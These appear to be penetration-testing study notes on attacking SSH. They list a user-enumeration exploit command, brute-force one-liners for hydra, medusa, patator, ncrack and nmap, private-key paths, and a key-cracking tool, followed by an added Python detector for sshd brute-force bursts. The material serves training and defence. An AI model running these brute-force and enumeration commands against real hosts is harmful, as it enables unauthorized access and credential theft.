OSCP Notes
SSH

User enumeration

python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
nmap -sV -p T:22 $ip

Vulnerable Versions

7.2p1

Connection

Connect to SSH

ssh <user name>@$ip

Connect to SSH with private key

ssh -i key <user name>@$ip

Brute-force

Patator

patator ssh_login host=$ip user=FILE0 0=user.txt password=FILE1 1=pass.txt

Hydra

Known username

hydra -v -V -l root -P pass.txt $ip ssh

Username and password attack

hydra -L user.txt -P pass.txt $ip ssh

Medusa

medusa -h $ip -U user.txt -P pass.txt -M ssh

Ncrack

ncrack -v -U user.txt -P pass.txt $ip:22

Nmap

nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst,ssh-brute.timeout=4s $ip
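
The brute-force tools above appear in the target's sshd log as bursts of "Failed password" entries. This added example (not part of the original notes) flags such bursts per source address and separates single-username guessing from username-list attacks. The log lines are constructed, and the threshold, window, year and function names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (documentation IP ranges, not real data).
SAMPLE_LOG = "\n".join(
    [f"Mar 10 10:00:0{i} host sshd[10{i}]: Failed password for root "
     f"from 203.0.113.5 port 4000{i} ssh2" for i in range(6)]
    + [f"Mar 10 10:05:0{i} host sshd[20{i}]: Failed password for invalid user {u} "
       f"from 198.51.100.7 port 5000{i} ssh2"
       for i, u in enumerate(["admin", "test", "oracle", "guest", "ftp"])]
    + ["Mar 10 11:00:00 host sshd[300]: Failed password for alice "
       "from 192.0.2.9 port 60000 ssh2"]
)

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def detect(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Flag sources with >= threshold failed logins inside a sliding window."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # Syslog timestamps carry no year, so one is supplied (assumption).
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events[m["src"]].append((ts, m["user"], bool(m["invalid"])))
    findings = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                users = sorted({u for _, u, _ in evs})
                findings[src] = {
                    # One name = password guessing; many = a username list.
                    "pattern": "single username" if len(users) == 1 else "username list",
                    "users": users,
                    "invalid_users": sorted({u for _, u, inv in evs if inv}),
                }
                break
    return findings

if __name__ == "__main__":
    for src, info in detect(SAMPLE_LOG).items():
        print(src, info)
```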

Path of id_rsa

$user/.ssh/id_rsa
$user/.ssh/authorized_keys

Crack id_rsa

/usr/share/john/ssh2john.py

Configuration files

ssh_config
sshd_config
authorized_keys
ssh_known_hosts
.shosts

Exploitation

    Gather version numbers
    Searchsploit
    Default Creds
    Creds previously gathered
    Download the software
Last modified 1yr ago